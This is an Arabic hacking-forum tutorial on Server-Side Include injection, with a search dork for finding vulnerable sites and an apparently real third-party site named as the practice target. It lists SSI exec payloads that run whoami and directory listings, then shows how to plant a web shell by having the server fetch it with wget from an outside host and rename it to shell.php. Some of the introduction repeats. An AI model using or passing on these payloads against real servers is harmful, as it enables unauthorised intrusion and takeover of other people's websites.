قنبلة : شرح ثغرات من نوع ssi Injection
السلام عليكم ورحمة الله وبركاتة
كيف الحال ؟
الموضوع محتاج فقط كاسه شاي
دورك بسيط : inurl:bin/Cklb/
ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #
اكواد ممكن ان تستعملها
هذا موقع للتطبيق #
http://dev.stockphotosamerica.com/bin/Cklb
نطبق الكود الثاني في الدخول
كيف الحال ؟
الموضوع محتاج فقط كاسه شاي
دورك بسيط : inurl:bin/Cklb/
ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #
اكواد ممكن ان تستعملها
PHP:
<!--#echo var="DATE_LOCAL" -->
Will display the Date
<!--#exec cmd="whoami"-->
Will show which user is running on the server
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
Will display all files in the directory
<!-- #exec cmd="dir" --> (Windows)
Will display all files in the directory
هذا موقع للتطبيق #
http://dev.stockphotosamerica.com/bin/Cklb
نطبق الكود الثاني في الدخول
PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
نشوف
تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل
نفذ التالي
PHP:
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
خلونا نشوف اذا الملف اذا انرفع ولالا
عن طريق امر
PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي
PHP:
<!--#exec cmd="mv shell.txt shell.php" -->
ونتاكد الان
استعرض
اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير
اخوكم حمد المهندي
اسم الموضوع : قنبلة : شرح ثغرات من نوع ssi Injection
|
المصدر : حقن xss - ssi
